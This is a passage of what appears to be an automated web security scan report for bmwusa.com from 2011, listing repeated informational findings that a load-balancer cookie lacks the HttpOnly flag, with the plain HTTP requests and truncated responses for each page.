Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:59:54 GMT;path=/
Content-Length: 214968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.249. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:39 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:39 GMT;path=/
Content-Length: 202084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.250. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:01 GMT;path=/
Content-Length: 214817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.251. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:01 GMT;path=/
Content-Length: 227586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.252. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:14:39 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:54:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:14:39 GMT;path=/
Content-Length: 227587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.253. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:30 GMT;path=/
Content-Length: 213527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.254. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:12 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:12 GMT;path=/
Content-Length: 213528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.255. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:04:11 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:44:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:04:11 GMT;path=/
Content-Length: 202023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.256. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:03:33 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:43:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:03:33 GMT;path=/
Content-Length: 214435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.257. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:04:24 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:44:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:04:24 GMT;path=/
Content-Length: 227015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.258. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:03:51 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:43:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:03:51 GMT;path=/
Content-Length: 215504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.259. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:24 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:24 GMT;path=/
Content-Length: 202297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.260. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:36 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:36 GMT;path=/
Content-Length: 202298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.261. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:16:14 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
